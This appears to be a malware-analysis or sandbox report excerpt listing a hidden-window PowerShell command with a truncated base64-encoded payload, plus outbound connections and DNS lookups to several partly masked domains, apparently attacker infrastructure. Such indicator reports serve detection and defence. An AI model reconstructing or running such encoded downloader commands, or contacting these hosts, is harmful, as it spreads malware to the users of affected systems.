Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...
- 'bl##.##ngjieyuan.com':443
- 'sc####na.education':443
- 'ma##i.site':443
- 'ma##.work':443
- DNS ASK sc####na.education
- DNS ASK ma##i.site
- DNS ASK ma##.work
- DNS ASK bl##.##ngjieyuan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...' (with hidden window)